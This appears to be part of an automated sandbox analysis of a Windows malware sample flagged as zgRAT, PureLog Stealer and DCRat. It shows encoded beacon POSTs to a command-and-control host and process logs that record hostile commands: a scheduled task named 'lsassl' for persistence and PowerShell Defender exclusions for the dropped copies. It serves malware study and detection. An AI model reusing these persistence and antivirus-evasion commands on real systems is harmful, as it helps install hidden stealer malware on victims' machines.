                                                                                    Dec 10, 2024 18:56:54.154683113 CET344OUTData Raw: 05 02 04 03 06 0d 04 07 05 06 02 01 02 0c 01 06 00 07 05 0e 02 0c 03 09 01 01 0d 56 05 03 03 52 0d 51 07 59 03 04 04 0a 0e 51 06 05 07 50 07 0e 04 07 0e 5e 0e 05 07 03 05 57 07 54 07 07 07 58 03 0a 0e 0c 00 00 01 04 0e 54 0f 03 0d 04 0d 02 04 04
                                                                                    Data Ascii: VRQYQP^WTXTT[\L~~sj`\mueUPhUv^cUthZk_y|]Jxpfnttgk^ie~V@{mfru
                                                                                    Dec 10, 2024 18:56:54.903166056 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:56:55.156069994 CET1033INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:56:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGiJxCFXy2nr0giY%2BiuZ7mHxecmuJMOKctQc9gJobJeuBRy%2BSjzBzztVtrdHA8Nw5JiSvAjcES7x3M1K173x9d%2FGRCfDFGyEurdTSxx4%2FT1OPAInsGHaIlrTTwy2PmM5ZJoY%2FtjYSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1d422992c44f-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3199&min_rtt=1734&rtt_var=3580&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=108501&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    5192.168.2.449766104.21.16.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:57:09.316735029 CET301OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:57:09.670263052 CET344OUTData Raw: 05 02 01 02 03 0a 04 01 05 06 02 01 02 07 01 03 00 01 05 0a 02 04 03 0e 07 04 0d 0c 03 0e 01 06 0d 01 04 5d 02 50 05 52 0b 0b 07 06 07 01 04 04 03 03 0f 00 0d 03 07 06 06 54 06 04 07 0a 05 58 05 07 0f 0d 00 04 07 51 0f 01 0f 02 0f 50 0f 04 07 53
                                                                                    Data Ascii: ]PRTXQPSRR\L}U~pbvbyMafkRhic|l~p|oRZY{NqXhmR@whOje~V@Ax}~O}ri
                                                                                    Dec 10, 2024 18:57:10.401350021 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:57:10.680888891 CET1027INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:57:10 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=auUHd77mNbIY1OFSqt2cPCeGF9%2BKIbFEsglIl2cnYKJ4pcvgaQtrCXw7UfVwo72QVPUkrsSEYBLD%2F%2FrwwEI6y4wALY0DPpOCZPmKpj3Qf6YPj7vQPXqtvglfPNYD23vZW883nk%2B0ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1da30b1178d6-EWR
                                                                                    alt-svc: h2=":443"; ma=60
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3533&min_rtt=1781&rtt_var=4172&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=92422&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    6192.168.2.449767104.21.16.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:57:17.463191032 CET337OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    7192.168.2.449768104.21.16.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:57:17.731216908 CET337OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:57:18.076374054 CET344OUTData Raw: 05 00 04 0d 06 0c 01 06 05 06 02 01 02 0d 01 05 00 07 05 09 02 03 03 0c 02 04 0d 53 06 53 00 05 0c 06 03 0f 00 00 05 52 0b 00 07 0b 00 05 07 51 06 0b 0b 08 0c 00 05 06 01 0f 04 07 06 0a 07 58 01 04 0e 0d 04 05 06 07 0c 07 0c 00 0f 57 0d 03 06 07
                                                                                    Data Ascii: SSRQXWYWW\L~kcy_vquwekUhlytBo\hMZxol_xszkmtcw`}e~V@{SfN~La
                                                                                    Dec 10, 2024 18:57:18.817718029 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:57:19.095565081 CET1030INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:57:18 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKnm5Aktim%2BkOGzhYTEDjQd417a%2FSLQ715r3CKgzplPfpzJUbXOV9sKuOpc%2F0z0DP8RM2uBgZzpePKm%2BpAmezsjTAsWnSEkw5ewZ5dTFkWpdS63IHoIN0lzzCQBZmYoopq2k4GtBnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1dd7ac5942ef-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=4035&min_rtt=1586&rtt_var=5494&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=68919&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    8192.168.2.449769104.21.16.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:57:25.600408077 CET337OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:57:25.951702118 CET344OUTData Raw: 05 01 01 07 06 0a 01 01 05 06 02 01 02 04 01 03 00 03 05 00 02 07 03 09 00 05 0a 07 07 0f 03 54 0c 0f 04 09 03 0d 06 55 0c 00 02 06 05 00 06 01 05 00 0d 00 0c 06 06 51 05 02 05 54 01 0a 06 58 00 50 0f 5e 05 00 04 53 0e 05 0b 06 0c 01 0e 05 07 57
                                                                                    Data Ascii: TUQTXP^SW\L}P|^z@cr}uKh|z\tRQX|c]_l|`YlNfh~`t^tju~V@@x}v}Lu
                                                                                    Dec 10, 2024 18:57:26.713639975 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:57:26.975044966 CET1032INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:57:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AagREarZeZlWCORPNbVh%2FdF17qqYnei67zS%2FF4igQ5vA%2FqoDn7PPZlhwi6RgY3%2FIKSE1OCvVxltPQI5aEFDXFqhnV0uMbXwboVuHtFd1%2FMgSWtcKBtWkLLlOoXzS1yW0s1LeJHZ3nA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1e08fc194356-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3514&min_rtt=1702&rtt_var=4263&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=90112&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    9192.168.2.449770104.21.16.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:57:33.679338932 CET301OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:57:34.029541016 CET344OUTData Raw: 05 05 04 01 03 0b 04 00 05 06 02 01 02 0d 01 06 00 03 05 08 02 04 03 0c 02 0e 0f 02 04 04 02 09 0c 02 04 01 02 06 05 52 0e 07 06 0b 07 06 04 01 03 00 0c 0f 0d 05 04 0b 01 06 06 51 07 04 05 00 01 04 0a 0c 07 55 05 07 0e 01 0c 55 0a 04 0d 04 04 0d
                                                                                    Data Ascii: RQUURV\L~|Yb`bawvt~lWclUYkc`l{Kx`b}{Q`Yxie~V@{mvA}ra
                                                                                    Dec 10, 2024 18:57:34.764107943 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:57:35.016144991 CET1025INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:57:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znrVN6YZReAP%2Fw3qnpZB1toKNEgQDb0oUF0soQre702DRXxtokfpRrq94DMxyXnseRSM4Ze7EY7FLUg%2BHwPHCyO1X%2BqK6b9hVq1aM2H8aq27OMDeRPbT%2FP8%2FP9M2eUB9pHU5BCRplA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1e3b4aef0f41-EWR
                                                                                    alt-svc: h2=":443"; ma=60
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3022&min_rtt=1630&rtt_var=3395&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=114366&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                    Dec 10, 2024 18:57:35.207669973 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:12:54:55
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\JNKHlxGvw4.exe"
                                                                                    Imagebase:0x1b0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1861105197.0000000012615000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:12:55:05
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:12:55:05
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:12:55:05
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP"
                                                                                    Imagebase:0x7ff71ce70000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:12:55:06
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:12:55:06
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Favorites\lsass.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Favorites\lsass.exe
                                                                                    Imagebase:0xc40000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:19
                                                                                    Start time:12:55:06
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Favorites\lsass.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Favorites\lsass.exe
                                                                                    Imagebase:0x2b0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:22
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                                                                    Imagebase:0x790000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:23
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                                                                    Imagebase:0xa10000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:26
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Recovery\USZqVcJFLA.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\USZqVcJFLA.exe
                                                                                    Imagebase:0x860000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:28
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Recovery\USZqVcJFLA.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\USZqVcJFLA.exe
                                                                                    Imagebase:0x50000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:29
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:30
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:31
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
